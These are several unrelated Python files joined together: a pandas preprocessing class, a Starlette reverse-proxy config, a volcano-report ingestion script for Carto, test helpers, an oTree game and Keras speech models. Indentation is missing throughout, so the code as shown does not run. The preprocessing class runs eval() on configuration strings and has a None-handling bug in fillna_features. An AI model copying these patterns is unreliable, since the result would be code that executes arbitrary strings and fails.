lambda x: x if self._is_nan(x) else self._elapsed_time_from_date(x, today, date_format))
if auto_bin_continuous_features:
continuous_bins[feature] = np.sort(list(
{
min(data[feature]) - 1,
np.quantile(data[feature].dropna(), 0.2),
np.quantile(data[feature].dropna(), 0.4),
np.quantile(data[feature].dropna(), 0.6),
np.quantile(data[feature].dropna(), 0.8),
max(data[feature]) + 1
}))
else:
continuous_columns += [feature]
elif mysql_type == 'NUMERIC':
unique_values = data[feature].dropna().unique()
if len(unique_values) == 1:
data = data.drop(feature, axis=1)
elif len(unique_values) == 2:
binary_columns += [feature]
elif (2 < len(unique_values) <= max_categories_num) and auto_bin_continuous_features:
categorical_columns += [feature]
elif auto_bin_continuous_features:
continuous_bins[feature] = np.sort(list(
{
min(data[feature]) - 1,
np.quantile(data[feature].dropna(), 0.2),
np.quantile(data[feature].dropna(), 0.4),
np.quantile(data[feature].dropna(), 0.6),
np.quantile(data[feature].dropna(), 0.8),
max(data[feature]) + 1
}))
else:
continuous_columns += [feature]
else: # mysql_type == TEXT
categorical_columns += [feature]
return data, categorical_columns, continuous_columns, binary_columns, continuous_bins
def combine_categorical_features(self, data_df, evaluated_df, sep='_|_'):
"""
Combining categories for each feature
:param data_df: original DataFrame
:param evaluated_df: calculated evaluated DataFrame for each category for each feature
:param sep: separation string
:return: DataFrame with combined categories
"""
features_mapping = {}
results_df = pd.DataFrame()
groups = pd.DataFrame.groupby(evaluated_df, 'feature_original_name')
for feature_original_name, group in groups:
if group.shape[0] > 1:
# feature_dummies_df = pd.get_dummies(data_df[feature_original_name])
filtered_feature_dummies_df = data_df[group['feature']]
combined_feature = filtered_feature_dummies_df.sum(axis=1)
# preparing feature output name
categorical_values = group['feature'].apply(lambda x: x.replace(feature_original_name + "_", ""))
categorical_values = categorical_values.astype(data_df.columns.dtype)
feature_output_name = feature_original_name + "_"
for val in categorical_values:
feature_output_name += "_" + str(val)
# adds combined feature to results DataFrame
results_df[feature_output_name] = combined_feature
else:
# save features mappings
custom_feature_full_name = group['feature'].iloc[0]
_, new_feature_value = custom_feature_full_name.split(sep)
features_mapping[feature_original_name] = [{
"name": custom_feature_full_name,
"categories": [new_feature_value]
}]
results_df[group['feature']] = data_df[group['feature']]
return results_df, features_mapping
def fillna_features(self, data, features_handling, default_filling=0, missing_values=None):
"""
Feature handling with filling missing values strategies
:param data: DataFrame
:param features_handling: configuration of how to handle each feature
:return: updated DataFrame with the requested filling
"""
if missing_values:
missing_values = {}
methods = {
"mean": lambda a: np.mean(a),
"median": lambda a: np.median(a),
"mode": lambda a: mode(a).mode[0],
"none": lambda a: np.nan,
"nan": lambda a: np.nan
}
if not isinstance(data, pd.DataFrame):
raise UnsupportedFileType("data type should be Dataframe")
if len(list(missing_values.keys())) > 0:
data.fillna(missing_values, inplace=True)
else:
missing_values = {}
specific_features = features_handling.keys()
for feature_key in data.columns:
# applying fill na on a feature
if feature_key in specific_features:
filling_missing_value = features_handling[feature_key].get("fillna")
else:
filling_missing_value = default_filling
if filling_missing_value in methods.keys():
filling_missing_value = filling_missing_value.lower()
val = methods[filling_missing_value](data[feature_key])
data[feature_key].fillna(val, inplace=True)
missing_values[feature_key] = val
elif isinstance(filling_missing_value, numbers.Number):
data[feature_key].fillna(filling_missing_value, inplace=True)
missing_values[feature_key] = filling_missing_value
else:
filling_missing_value = eval(filling_missing_value)
if filling_missing_value is None or filling_missing_value == np.nan:
data[feature_key] = data[feature_key].fillna(methods["none"], inplace=True)
missing_values[feature_key] = np.nan
else:
val = filling_missing_value(data[feature_key])
data[feature_key].fillna(val, inplace=True)
missing_values[feature_key] = val
return data, missing_values
def transform_features(self, data,features_handling):
'''
Feature handling with transformation strategies
:param data:
:param features_handling:
:return: DataFrame - updated DataFrame with the requested transformations
'''
if not isinstance(data, pd.DataFrame):
raise UnsupportedFileType("data type should be Dataframe")
features = features_handling.keys()
for feature_key in features:
# applying transformations
feature_transformation_methods = features_handling[feature_key].get("transformation", [])
for feature_transformation_method in feature_transformation_methods:
data[feature_key] = eval(feature_transformation_method)(data[feature_key])
# applying dummies
feature_dummies_flag = features_handling[feature_key].get("dummies", False)
if feature_dummies_flag:
dummies_df = pd.get_dummies(data[feature_key], dummy_na=False)
dummies_df['index'] = data.index.values
dummies_df = dummies_df.set_index('index')
data = pd.concat([data, dummies_df], axis=1)
data = data.drop(feature_key, axis=1)
return data
def get_days_from_date(self, data, date_column, extraction_date):
datenow = datetime.datetime.strptime(extraction_date, '%Y%m%d')
transformed_data = date_column
transformed_data = datenow - pd.to_datetime(data[transformed_data], format='%Y%m%d')
data[date_column] = transformed_data.dt.days
return data
def remove_features_by_null_threshold(self, data, percentage=0.3):
"""
Removing data with amount of 'nulls' more then the 'percentage'
:param data: the DataFrame
:param percentage: percentage - default 30%
:return: pandas DataFrame
"""
# data = data.loc[:, data.isnull().mean() < percentage]
n_features = data.shape[1]
data = data.loc[:, data.isnull().mean() < percentage]
new_n_features = data.shape[1]
if n_features == new_n_features:
print("Features number did not changed, did not found null features more than %0.2f percentage" % percentage)
else:
print("%d Features has removed, new data shape is (%d,%d)" % ((n_features - new_n_features), data.shape[0], data.shape[1]))
return data
def _is_nan(self, x):
try:
return np.isnan(x) or x == ""
except:
return False
def _convert_text_to_date_type(self, data_type, field, csv_file, dates_format=None):
if dates_format is None:
dates_format = ["%d/%m/%Y", "%Y-%m-%d"]
if data_type in ['int64', 'float64', 'float32', 'int32']:
return "NUMERIC", None
elif data_type == "object":
for val in csv_file[field]:
if val is not None and val is not np.nan:
for date_format in dates_format:
try:
datetime.datetime.strptime(val, date_format)
return "DATETIME", date_format
except:
continue
return "TEXT", None
else:
return "TEXT", None
else:
return "TEXT", None
def _elapsed_time_from_date(self, x, today, date_format):
try:
return np.round(np.abs((today - datetime.datetime.strptime(str(x), date_format)).days) / 365, 1)
except:
return np.nan
|
from typing import Optional, Union
from urllib.parse import urljoin
import aiohttp
from starlette.datastructures import Headers
from starlette.requests import Request
from starlette.types import Scope
from starlette.websockets import WebSocket
Headerlike = Union[dict, Headers]
class ProxyConfig:
def get_upstream_url(self, *, scope: Scope) -> str:
"""
Get the upstream URL for a client request.
"""
raise NotImplementedError("...")
def get_upstream_url_with_query(self, *, scope: Scope) -> str:
"""
Get the upstream URL for a client request, including any query parameters to include.
"""
# The default implementation simply appends the original URL's query string to the
# upstream URL generated by `get_upstream_url`.
url = self.get_upstream_url(scope=scope)
query_string = scope.get("query_string")
if query_string:
sep = "&" if "?" in url else "?"
url += "{}{}".format(sep, query_string.decode("utf-8"))
return url
def process_client_headers(self, *, scope: Scope, headers: Headers) -> Headerlike:
"""
Process client HTTP headers before they're passed upstream.
"""
return headers
def process_upstream_headers(
self, *, scope: Scope, proxy_response: aiohttp.ClientResponse
) -> Headerlike:
"""
Process upstream HTTP headers before they're passed to the client.
"""
return proxy_response.headers # type: ignore
def get_upstream_http_options(
self, *, scope: Scope, client_request: Request, data
) -> dict:
"""
Get request options (as passed to aiohttp.ClientSession.request).
"""
return dict(
method=client_request.method,
url=self.get_upstream_url_with_query(scope=scope),
data=data,
headers=self.process_client_headers(
scope=scope,
headers=client_request.headers,
),
allow_redirects=False,
)
def get_upstream_websocket_options(
self, *, scope: Scope, client_ws: WebSocket
) -> dict:
"""
Get websocket connection options (as passed to aiohttp.ClientSession.ws_connect).
"""
return dict(
method=scope.get("method", "GET"),
url=self.get_upstream_url(scope=scope),
headers=self.process_client_headers(scope=scope, headers=client_ws.headers),
)
class BaseURLProxyConfigMixin:
upstream_base_url: str
rewrite_host_header: Optional[str] = None
def get_upstream_url(self, scope: Scope) -> str:
return urljoin(self.upstream_base_url, scope["path"])
def process_client_headers(
self, *, scope: Scope, headers: Headerlike
) -> Headerlike:
"""
Process client HTTP headers before they're passed upstream.
"""
if self.rewrite_host_header:
headers = headers.mutablecopy() # type: ignore
headers["host"] = self.rewrite_host_header
return super().process_client_headers(scope=scope, headers=headers) # type: ignore
|
import logging
import sys
import os
import requests as req
from collections import OrderedDict
import cartosql
import lxml
from xmljson import parker as xml2json
from dateutil import parser
import requests
import datetime
### Constants
SOURCE_URL = "http://volcano.si.edu/news/WeeklyVolcanoRSS.xml"
DATETIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
LOG_LEVEL = logging.INFO
CLEAR_TABLE_FIRST = False
### Table name and structure
CARTO_TABLE = 'dis_003_volcano_reports'
CARTO_SCHEMA = OrderedDict([
('uid', 'text'),
('the_geom', 'geometry'),
('pubdate', 'timestamp'),
('volcano_name', 'text'),
('country_name', 'text'),
('description', 'text'),
('sources', 'text')
])
UID_FIELD = 'uid'
TIME_FIELD = 'pubdate'
# Table limits
MAX_ROWS = 1000000
MAX_AGE = datetime.datetime.today() - datetime.timedelta(days=365*5)
DATASET_ID = '60d3b365-6c0b-4f1c-9b7f-f3f00f2a05d7'
def lastUpdateDate(dataset, date):
apiUrl = 'http://api.resourcewatch.org/v1/dataset/{0}'.format(dataset)
headers = {
'Content-Type': 'application/json',
'Authorization': os.getenv('apiToken')
}
body = {
"dataLastUpdated": date.isoformat()
}
try:
r = requests.patch(url = apiUrl, json = body, headers = headers)
logging.info('[lastUpdated]: SUCCESS, '+ date.isoformat() +' status code '+str(r.status_code))
return 0
except Exception as e:
logging.error('[lastUpdated]: '+str(e))
###
## Carto code
###
def checkCreateTable(table, schema, id_field, time_field):
'''
Get existing ids or create table
Return a list of existing ids in time order
'''
if cartosql.tableExists(table):
logging.info('Table {} already exists'.format(table))
else:
logging.info('Creating Table {}'.format(table))
cartosql.createTable(table, schema)
cartosql.createIndex(table, id_field, unique=True)
if id_field != time_field:
cartosql.createIndex(table, time_field)
def deleteExcessRows(table, max_rows, time_field, max_age=''):
'''Delete excess rows by age or count'''
num_dropped = 0
if isinstance(max_age, datetime.datetime):
max_age = max_age.isoformat()
# 1. delete by age
if max_age:
r = cartosql.deleteRows(table, "{} < '{}'".format(time_field, max_age))
num_dropped = r.json()['total_rows']
# 2. get sorted ids (old->new)
r = cartosql.getFields('cartodb_id', table, order='{}'.format(time_field),
f='csv')
ids = r.text.split('\r\n')[1:-1]
# 3. delete excess
if len(ids) > max_rows:
r = cartosql.deleteRowsByIDs(table, ids[:-max_rows])
num_dropped += r.json()['total_rows']
if num_dropped:
logging.info('Dropped {} old rows from {}'.format(num_dropped, table))
return num_dropped
###
## Accessing remote data
###
def genUID(lat,lon,dt):
return '{}_{}_{}'.format(lat,lon,dt)
def processData(existing_ids):
"""
Inputs: FTP SOURCE_URL and filename where data is stored, existing_ids not to duplicate
Actions: Retrives data, dedupes and formats it, and adds to Carto table
Output: Number of new rows added
"""
new_data = []
new_ids = []
res = req.get(SOURCE_URL)
xml = lxml.etree.fromstring(res.content)
json = xml2json.data(xml)
items = json['channel']['item']
for item in items:
title = item['title'].split(')')[0].split('(')
place_info = [place.strip() for place in title]
volcano_name = place_info[0]
country_name = place_info[1]
coords = item['{http://www.georss.org/georss}point'].split(' ')
dt = parser.parse(item['pubDate'], fuzzy=True).strftime(DATETIME_FORMAT)
lat = coords[0]
lon = coords[1]
geom = {
'type':'Point',
'coordinates':[lon,lat]
}
info = item['description'].split('Source:')
if len(info) < 2:
info = item['description'].split('Sources:')
description_text = [text.replace('<p>','').replace('</p>','') for text in info]
description = description_text[0]
sources = description_text[1]
_uid = genUID(lat,lon,dt)
if _uid not in existing_ids + new_ids:
new_ids.append(_uid)
row = []
for field in CARTO_SCHEMA:
if field == 'uid':
row.append(_uid)
elif field == 'the_geom':
row.append(geom)
elif field == 'pubdate':
row.append(dt)
elif field == 'description':
row.append(description)
elif field == 'sources':
row.append(sources)
elif field == 'volcano_name':
row.append(volcano_name)
elif field == 'country_name':
row.append(country_name)
new_data.append(row)
num_new = len(new_ids)
if num_new:
logging.info('Adding {} new records'.format(num_new))
cartosql.blockInsertRows(CARTO_TABLE, CARTO_SCHEMA.keys(), CARTO_SCHEMA.values(), new_data)
return(num_new)
def get_most_recent_date(table):
#pubdate is the date the report was published
r = cartosql.getFields('pubdate', table, f='csv', post=True)
dates = r.text.split('\r\n')[1:-1]
dates.sort()
most_recent_date = datetime.datetime.strptime(dates[-1], '%Y-%m-%d %H:%M:%S')
return most_recent_date
###
## Application code
###
def main():
logging.basicConfig(stream=sys.stderr, level=LOG_LEVEL)
if CLEAR_TABLE_FIRST:
if cartosql.tableExists(CARTO_TABLE):
cartosql.deleteRows(CARTO_TABLE, 'cartodb_id IS NOT NULL', user=os.getenv('CARTO_USER'), key=os.getenv('CARTO_KEY'))
### 1. Check if table exists, if not, create it
checkCreateTable(CARTO_TABLE, CARTO_SCHEMA, UID_FIELD, TIME_FIELD)
### 2. Retrieve existing data
r = cartosql.getFields(UID_FIELD, CARTO_TABLE, order='{} desc'.format(TIME_FIELD), f='csv')
existing_ids = r.text.split('\r\n')[1:-1]
num_existing = len(existing_ids)
### 3. Fetch data from FTP, dedupe, process
num_new = processData(existing_ids)
### 4. Delete data to get back to MAX_ROWS
num_dropped = deleteExcessRows(CARTO_TABLE, MAX_ROWS, TIME_FIELD, MAX_AGE)
### 5. Notify results
total = num_existing + num_new - num_dropped
# Get most recent update date
most_recent_date = get_most_recent_date(CARTO_TABLE)
lastUpdateDate(DATASET_ID, most_recent_date)
logging.info('Existing rows: {}, New rows: {}, Max: {}'.format(total, num_new, MAX_ROWS))
logging.info("SUCCESS")
|
# -*- coding:utf-8 -*-
# Copyright (c) 2013, Theo Crevon
# Copyright (c) 2013, Greg Leclercq
#
# See the file LICENSE for copying permission.
from swf.models.event.base import Event
from swf.models.event.compiler import CompiledEvent
class MarkerEvent(Event):
_type = "Marker"
class CompiledMarkerEvent(CompiledEvent):
_type = "Marker"
states = ("recorded",)
transitions = {}
initial_state = "recorded"
|
# Copyright (C) 2019 NTT DATA
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from requests_mock.contrib import fixture as requests_mock_fixture
import testtools
from unittest import mock
from cliff import columns as cliff_columns
class FixturedTestCase(testtools.TestCase):
client_fixture_class = None
api_version = '1'
def setUp(self):
super(FixturedTestCase, self).setUp()
self.app = mock.MagicMock()
if self.client_fixture_class:
self.requests_mock = self.useFixture(requests_mock_fixture.
Fixture())
fix = self.client_fixture_class(self.requests_mock,
api_version=self.api_version)
self.cs = self.useFixture(fix).client
def check_parser(self, cmd, args, verify_args):
cmd_parser = cmd.get_parser('check_parser')
try:
parsed_args = cmd_parser.parse_args(args)
except SystemExit:
raise ParserException
for av in verify_args:
attr, value = av
if attr:
self.assertIn(attr, parsed_args)
self.assertEqual(getattr(parsed_args, attr), value)
return parsed_args
def assertNotCalled(self, m, msg=None):
"""Assert a function was not called"""
if m.called:
if not msg:
msg = 'method %s should not have been called' % m
self.fail(msg)
def assertListItemsEqual(self, expected, actual):
"""Assertion based on human_readable values of list items"""
self.assertEqual(len(expected), len(actual))
for col_expected, col_actual in zip(expected, actual):
if isinstance(col_actual, tuple):
self.assertListItemsEqual(col_expected, col_actual)
elif isinstance(col_expected, cliff_columns.FormattableColumn):
self.assertIsInstance(col_actual, col_expected.__class__)
self.assertEqual(col_expected.human_readable(),
col_actual.human_readable())
else:
self.assertEqual(col_expected, col_actual)
class ParserException(Exception):
pass
|
from AudioData import AudioData
import numpy as np
def test_it_handles_already_normalized_data():
audioData = AudioData()
arr = np.array([0, 1])
assert (audioData.normalize(arr) == arr).all()
def test_that_it_normalizes_data():
audioData = AudioData()
arr = np.array([0, 2])
assert (audioData.normalize(arr) == np.array([0, 1])).all()
def test_that_it_handles_negative_numbers():
audioData = AudioData()
arr = np.array([-1, 0])
assert (audioData.normalize(arr) == np.array([0, 1])).all()
def test_that_it_handles_a_large_range():
audioData = AudioData()
arr = np.array([-2, 2])
assert (audioData.normalize(arr) == np.array([0, 1])).all()
def test_that_it_handles_multiple_numbers():
audioData = AudioData()
arr = np.array([-2, -1, 0, 1, 2, 3])
assert (audioData.normalize(arr) == np.array([0, 0.2, 0.4, 0.6, 0.8, 1])).all()
def test_that_it_handles_multiple_dimensions():
audioData = AudioData()
arr = np.array([[0, 1], [3, 4]])
assert (audioData.normalize(arr) == np.array([[0, 0.25], [0.75, 1]])).all()
def test_that_it_handles_multiple_dimensions_with_negative_numbers():
audioData = AudioData()
arr = np.array([[-2, -3], [2, 1]])
assert (audioData.normalize(arr) == np.array([[0.2, 0], [1, 0.8]])).all()
def test_that_it_handles_a_divisor_that_is_zero():
audioData = AudioData()
arr = np.array([0, 0])
assert (audioData.normalize(arr) == np.array([0, 0])).all()
def test_that_it_handles_a_divisor_that_is_zero_with_numbers_that_are_not():
audioData = AudioData()
arr = np.array([2, 2])
assert (audioData.normalize(arr) == np.array([0, 0])).all()
|
from app.models import db
class LibraryBook(db.Model):
__tablename__ = "library_book"
# table columns
id = db.Column(db.Integer, primary_key=True)
book_id = db.Column(db.Integer, db.ForeignKey("book.id"), nullable=False)
library_id = db.Column(db.Integer, db.ForeignKey("library.id"), nullable=False)
is_available = db.Column(db.Boolean)
# relationships
book = db.relationship("Book", back_populates="libraries")
library = db.relationship("Library", back_populates="books")
|
import pygame
from pygame.locals import *
import obstacle
from utils import *
class Environnement(pygame.sprite.Group):
def __init__(self):
super().__init__()
self.new_obs = None
def process_event(self, event):
if event.type == MOUSEBUTTONDOWN:
# Check for collision
clicked_sprites = [s for s in self if s.rect.collidepoint(event.pos)]
if event.button == 1 and self.new_obs == None:
if not clicked_sprites:
# Create new obstacle
self.new_obs = obstacle.Obstacle(event.pos, (0, 0))
self.add(self.new_obs)
if event.button == 3:
for s in clicked_sprites:
self.remove(s)
s.kill()
if event.type == MOUSEBUTTONUP:
if event.button == 1 and self.new_obs != None:
size = self.new_obs.rect.size
if size[0] < 1 or size[1] < 1:
print('Remove sprite, too small')
self.remove(self.new_obs)
self.new_obs = None
return self.new_obs
def update_selection(self, new_pos, collision_group):
if self.new_obs == None:
return
# NOTE: Really ugly but I haven't found a better solution yet
next_obs = obstacle.Obstacle(self.new_obs.rect.topleft, self.new_obs.rect.size)
next_obs.update_button_right(new_pos)
# print(next_obs.rect, self.new_obs.rect)
collision_list = pygame.sprite.spritecollide(next_obs, collision_group, False, collided = square_circle_collider)
if collision_list:
return
self.new_obs.update_button_right(new_pos)
|
# -*- coding: utf-8 -*-
# <standard imports>
from __future__ import division
import random
import otree.models
import otree.constants
from otree.db import models
from otree import widgets
from otree.common import Currency as c, currency_range, safe_json
from otree.constants import BaseConstants
from otree.models import BaseSubsession, BaseGroup, BasePlayer
# </standard imports>
author = 'Your name here'
doc = """
Your app description
"""
class Constants(BaseConstants):
name_in_url = 'public_goods_nopunishment_noise'
players_per_group = 3
num_rounds = 30
# define more constants here
endowment = c(20)
efficiency_factor = 0.5
class Subsession(BaseSubsession):
pass
class Group(BaseGroup):
# <built-in>
subsession = models.ForeignKey(Subsession)
# </built-in>
total_contribution = models.CurrencyField()
individual_share = models.CurrencyField()
def set_payoffs(self):
self.total_contribution = sum([p.contribution for p in self.get_players()])
self.individual_share = self.total_contribution * Constants.efficiency_factor
for p in self.get_players():
p.payoff = Constants.endowment - p.contribution + self.individual_share
x = random.random()
if x < 0.1:
p.record = 0
if x >= 0.1:
p.record = p.contribution
class Player(BasePlayer):
# <built-in>
subsession = models.ForeignKey(Subsession)
group = models.ForeignKey(Group, null = True)
# </built-in>
contribution = models.CurrencyField(choices=[0,Constants.endowment],widget=widgets.RadioSelect())
record = models.CurrencyField()
def other_player(self):
"""Returns other player in group. Only valid for 2-player groups."""
return self.get_others_in_group()
|
from keras import backend as K
from keras.models import Model
from keras.layers import (BatchNormalization, Conv1D, Dense, Input,
TimeDistributed, Activation, Bidirectional, SimpleRNN, GRU, LSTM, CuDNNGRU, CuDNNLSTM, Dropout)
def simple_rnn_model(input_dim, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = GRU(output_dim, return_sequences=True,
implementation=2, name='rnn')(input_data)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(simp_rnn)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def rnn_model(input_dim, units, activation, output_dim=29):
""" Build a recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add recurrent layer
simp_rnn = GRU(units, activation=activation,
return_sequences=True, implementation=2, name='rnn')(input_data)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name = 'bn')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def cnn_rnn_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, units, output_dim=29, rnn_type = 'SIMPLE'):
""" Build a recurrent + convolutional network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
# Add a recurrent layer
simp_rnn = rnn_tensor(units, bn_cnn, rnn_type = rnn_type)
# TODO: Add batch normalization
bn_rnn = BatchNormalization(name='bn_rnn')(simp_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
def cnn_output_length(input_length, filter_size, border_mode, stride,
dilation=1):
""" Compute the length of the output sequence after 1D convolution along
time. Note that this function is in line with the function used in
Convolution1D class from Keras.
Params:
input_length (int): Length of the input sequence.
filter_size (int): Width of the convolution kernel.
border_mode (str): Only support `same` or `valid`.
stride (int): Stride size used in 1D convolution.
dilation (int)
"""
if input_length is None:
return None
assert border_mode in {'same', 'valid'}
dilated_filter_size = filter_size + (filter_size - 1) * (dilation - 1)
if border_mode == 'same':
output_length = input_length
elif border_mode == 'valid':
output_length = input_length - dilated_filter_size + 1
return (output_length + stride - 1) // stride
def deep_rnn_model(input_dim, units, recur_layers, output_dim=29, rnn_type = 'GRU' ):
""" Build a deep recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add recurrent layers, each with batch normalization
rnn = rnn_tensor(units, input_data,
rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn')(rnn)
dropout = Dropout (rate =.2)(bn_rnn)
for layer in range (1, recur_layers):
rnn = rnn_tensor(units, dropout, layer = str(layer), rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn'+ str(layer))(rnn)
dropout = Dropout (rate =.2)(bn_rnn)
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(dropout)
dropout = Dropout (rate =.2)(time_dense)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(dropout)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def rnn_tensor (units, input, return_sequences =True, implementation = 2, layer = "", rnn_type = 'SIMPLE'):
return rnn_layer(units= units, return_sequences = return_sequences, implementation= implementation, layer= layer, rnn_type=rnn_type)(input)
def rnn_layer (units, return_sequences =True, implementation = 2, layer = "", rnn_type = 'SIMPLE'):
if rnn_type == 'SIMPLE':
simp_rnn = SimpleRNN(units, activation='relu',
return_sequences=return_sequences, implementation=2, name='rnn_simp' + layer)
elif rnn_type == 'GRU':
simp_rnn = GRU(units,
return_sequences=return_sequences, implementation=implementation, name='rnn_gru' + layer)
elif rnn_type == "LSTM":
simp_rnn = LSTM(units,
return_sequences=return_sequences, implementation=implementation, name='rnn_lstm' + layer)
elif rnn_type == 'Cu-GRU':
simp_rnn = CuDNNGRU(units,
return_sequences=return_sequences, name='CuDNN_gru' + layer)
elif rnn_type == "Cu-LSTM":
simp_rnn = CuDNNLSTM(units,
return_sequences=return_sequences, name='CuDNN_lstm' + layer)
return simp_rnn
def bidirectional_rnn_model(input_dim, units, output_dim=29, rnn_type = "GRU"):
""" Build a bidirectional recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add bidirectional recurrent layer
#rnn = rnn_layer(units, rnn_type = rnn_type)
#print (type(rnn), type (input_data), type (Dense(5)))
bidir_rnn1 = Bidirectional(rnn_layer(units, rnn_type = rnn_type)) (input_data)
#rnn_bn = BatchNormalization(name='rnn-bn1')
#bidir_rnn2 = Bidirectional(rnn_layer(units, input_data,rnn_type = rnn_type)) (input_data)
#rnn_bn2 = BatchNormalization(name='rnn-bn2')(
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(bidir_rnn1)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def bidirectional_rnn_model2(input_dim, units, output_dim=29, rnn_type = "GRU"):
""" Build a bidirectional recurrent network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# TODO: Add bidirectional recurrent layer
#rnn = rnn_layer(units, rnn_type = rnn_type)
#print (type(rnn), type (input_data), type (Dense(5)))
bidir_rnn1 = Bidirectional(rnn_layer(units, rnn_type = rnn_type)) (input_data)
dropout = Dropout(rate =.2)(bidir_rnn1)
bidir_rnn2 = Bidirectional(rnn_layer(units, rnn_type = rnn_type)) (dropout)
dropout = Dropout(rate =.2)(bidir_rnn2)
#rnn_bn = BatchNormalization(name='rnn-bn1')
#bidir_rnn2 = Bidirectional(rnn_layer(units, input_data,rnn_type = rnn_type)) (input_data)
#rnn_bn2 = BatchNormalization(name='rnn-bn2')(
# TODO: Add a TimeDistributed(Dense(output_dim)) layer
time_dense = TimeDistributed(Dense (output_dim))(dropout)
dropout = Dropout(rate =.2)(time_dense)
# Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(dropout)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
model.output_length = lambda x: x
print(model.summary())
return model
def final_model(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, recur_layers, units, output_dim=29, rnn_type = 'SIMPLE', dropout = 0):
""" Build a deep network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
bn_cnn = Dropout(rate = dropout)(bn_cnn)
rnn = rnn_tensor(units, bn_cnn,
rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn')(rnn)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
for layer in range (1, recur_layers):
rnn = rnn_tensor(units, bn_rnn, layer = str(layer), rnn_type = rnn_type)
bn_rnn = BatchNormalization(name = 'bn-rnn'+ str(layer))(rnn)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
time_dense = Dropout(rate = dropout)(time_dense)
# TODO: Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
# TODO: Specify model.output_length
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model
def final_model1(input_dim, filters, kernel_size, conv_stride,
conv_border_mode, recur_layers, units, output_dim=29, rnn_type = 'SIMPLE', dropout = 0):
""" Build a deep network for speech
"""
# Main acoustic input
input_data = Input(name='the_input', shape=(None, input_dim))
# Add convolutional layer
conv_1d = Conv1D(filters, kernel_size,
strides=conv_stride,
padding=conv_border_mode,
activation='relu',
name='conv1d')(input_data)
# Add batch normalization
bn_cnn = BatchNormalization(name='bn_conv_1d')(conv_1d)
bn_cnn = Dropout(rate = dropout)(bn_cnn)
rnn = rnn_layer(units,
rnn_type = rnn_type)
bidir_rnn1 = Bidirectional(rnn) (bn_cnn)
bn_rnn = BatchNormalization(name = 'bn-rnn')(bidir_rnn1)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
for layer in range (1, recur_layers):
rnn = rnn_layer(units, layer = str(layer), rnn_type = rnn_type)
bidir_rnn1 = Bidirectional(rnn) (bn_rnn)
bn_rnn = BatchNormalization(name = 'bn-rnn'+ str(layer))(bidir_rnn1)
bn_rnn = Dropout(rate = dropout)(bn_rnn)
time_dense = TimeDistributed(Dense (output_dim))(bn_rnn)
time_dense = Dropout(rate = dropout)(time_dense)
# TODO: Add softmax activation layer
y_pred = Activation('softmax', name='softmax')(time_dense)
# Specify the model
model = Model(inputs=input_data, outputs=y_pred)
# TODO: Specify model.output_length
model.output_length = lambda x: cnn_output_length(
x, kernel_size, conv_border_mode, conv_stride)
print(model.summary())
return model |
#!/usr/bin/env python3
"""
MIT License
Copyright (c) 2021 Ygor Simões
